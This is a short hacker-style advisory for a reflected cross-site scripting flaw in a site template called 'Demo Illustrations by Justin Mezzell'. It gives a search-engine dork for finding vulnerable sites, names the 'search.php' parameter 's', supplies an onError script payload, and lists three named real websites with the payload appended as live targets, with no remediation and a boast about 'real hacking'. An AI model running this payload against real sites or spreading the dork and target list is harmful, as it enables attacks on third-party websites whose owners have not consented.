# [+] Title : Demo Illustrations by Justin Mezzell reflected XSS # [+] Author (Discover) : ABDO10 # [+] Date : Jun, 16th 2019 # [+] Dork : allintext:"Demo Illustrations by Justin Mezzell" # [+] Poc Instructions : + We have to dork in search engine + we have to set payload on the vulnerable file "search.php" in the parameter "s" + E.g [target]/[path]/search.php?s=<img src="xy" onError=prompt(document.domain)> # [+] Alive E.g : + http://www.plasticosajaco.com/search.php?s=<img src="xy" onError=prompt(document.domain)> + https://nokesolutions.com/samples/codester/search.php?s=<img src="xy" onError=prompt(document.domain)> + http://schoolnepal.org/search.php?s=<img src="xy" onError=prompt(document.domain)> ``... and more ... This the real hacking #ahmed cmd`` `` Greetz Lakarha_Family ``